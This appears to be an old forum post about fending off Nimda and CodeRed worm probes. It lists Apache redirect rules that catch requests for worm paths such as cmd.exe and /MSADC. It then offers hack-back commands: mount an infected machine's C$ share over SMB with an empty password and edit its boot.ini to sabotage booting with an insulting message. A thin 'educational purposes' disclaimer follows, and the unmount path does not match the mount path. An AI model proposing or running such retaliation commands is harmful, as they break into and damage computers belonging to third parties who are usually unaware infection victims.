I'm about half sick of Nimda and CodeRed. I get thousands of requests a month for both. It's annoying the hell out of me. I added these to my httpd.conf file:

Redirect /scripts http://www.microsoft.com Redirect /MSADC http://www.microsoft.com Redirect /c http://www.microsoft.com Redirect /d http://www.microsoft.com Redirect /_mem_bin http://microsoft.com Redirect /msadc http://microsoft.com RedirectMatch (.*)\cmd.exe$ http://microsoft.com$1

It seems to keep out the riffraff.

If you get a machine that really really wants into your system (I have a couple that won't leave me alone), then this might be an option for you:

mount -t smbfs password= //xx.xx.xx.xx/C$ /mnt/luser
vi /mnt/luser/boot.ini

Change the "BootDelay=" to "BootDelay=99999" and the boot message to "Run a virus scanner, asshole".

umount /mnt/dork

Note that I don't condone this sort of activity personally, but only mention it for educational purposes.